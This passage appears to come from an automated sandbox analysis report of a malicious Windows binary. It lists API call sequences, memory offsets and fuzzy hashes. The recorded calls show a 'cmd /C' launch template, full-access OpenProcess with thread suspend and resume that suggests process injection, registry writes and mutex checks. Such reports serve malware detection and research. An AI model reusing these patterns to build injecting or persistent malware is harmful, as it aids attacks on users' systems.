    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
